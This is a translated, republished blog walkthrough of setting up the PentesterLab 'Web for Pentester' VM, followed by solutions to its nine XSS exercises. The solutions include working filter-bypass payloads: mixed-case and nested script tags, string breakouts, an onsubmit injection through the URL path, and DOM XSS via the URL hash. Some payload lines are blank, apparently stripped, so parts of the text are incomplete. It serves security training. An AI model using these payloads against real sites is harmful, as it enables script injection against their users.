"Web Security" third bomb: Web defense Platform Pentester installation and XSS part answer analysis

Source: Internet
Author: User
Tags fdf

Web for Pentester is a penetration testing platform developed by foreign security researchers, which allows you to learn about common Web vulnerability detection techniques.

Download link and document Description:

http://pentesterlab.com/exercises/web_for_pentester/

"Installation Process"

1. Mount the image in the virtual machine. After downloading the iOS image, create a new system in the virtual machine.

All the way down, create a virtual system.

Click Start and select ISO image to start.

2. Set up the network. Turn off the system you just opened.

Click Settings and select Network Options. Set up a network

3. Start the system. Input Ifconfig

Can see that the IP address of our virtual machine is http://192.168.56.101/different systems may not be the same

If you want the host to access the virtual machine, you must have the host and the virtual machine within the same network segment.

So open the network and Sharing center on the host, set the IP

Based on my virtual machine IP, the IP I set for this machine is as follows:

4. In the host browser input virtual machine IP, I here is http://192.168.56.101/, you can access the virtual machine via HTTP!!

"XSS Partial Resolution"

XSS example1:

No filtering or coding at all, playing in various poses ~

Name=<script>alert (' BB ') </script>

XSS example2:

From here you can see, filter out the <script> tags, we try to write the case?

Name=<script>alert (' BB ') </sCript>

Well, the case is bypassed.

XSS Example3:

As in the previous picture, the,<script> tag was filtered out.

Try Name=la<script>la first, output Hello,lala

Name=<scri<script>pt>alert (' BB ') </scri</script>pt>

Tested this can be used in instance 2.

XSS example4:

First enter the most basic test name=<script>alert (' BB ') </script>

Unexpectedly output Error!

A different label? NAME=: No error this time. Complement full complement ~

Name=

Success ~ ~ Tested this payload in the first three should also be possible

XSS example5:

Enter name= normal display first

Complement name= Output error

The alert was found to be filtered out--but other functions could be used,

For example name=

Checked the documentation and found it could be written like this.

Name=

This world is so magical.

XSS Example6:

Look at the element and discover that the output is in the script tag.

$a = " '

If the output is in the script label, close the double quotation marks first.

NAME=FDF "; alert ($a);//

XSS Example7:

Review elements:

<script>
var $a = ' fdf&quot;; alert ($a);//';
</script>

I found the double quotes were htmlencode.

--also found $a= ' this place into single quotes ... Change it a little bit.

NAME=FDF '; alert ($a);//

Become a

XSS Example8:

Yo, finally grow, become a storage type of ~

Randomly output a name <script>alert (' a ') </script>

Review elements

HELLO &lt;script&gt;alert (' a ') &lt;/script&gt;

<> has been htmlencode.

Such filtering is sufficient for the output of the content in HTML. So where's the loophole?

A reminder of the answer--we find that the target URL of the form table can be constructed

Http://192.168.56.101/xss/example8.php/%22%20onsubmit=%22alert (' 1 ')

The pop-up window will be triggered at the time of submission

XSS Example9:

--The last one, are you kidding me?

Review elements

<script>
document.write (location.hash.substring (1));
</script>

Just change it for the better. Http://192.168.56.101/xss/example9.php#<script>alert (' 1 ') </script>

Note: Official answer address: http://files.pentesterlab.com/web_for_pentester/web_for_pentester.pdf

"Web Security" third bomb: Web defense Platform Pentester installation and XSS part answer analysis

Large-Scale Price Reduction
  • 59% Max. and 23% Avg.
  • Price Reduction for Core Products
  • Price Reduction in Multiple Regions
undefined. /
Connect with us on Discord
  • Secure, anonymous group chat without disturbance
  • Stay updated on campaigns, new products, and more
  • Support for all your questions
undefined. /
Free Tier
  • Start free from ECS to Big Data
  • Get Started in 3 Simple Steps
  • Try ECS t5 1C1G
undefined. /

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.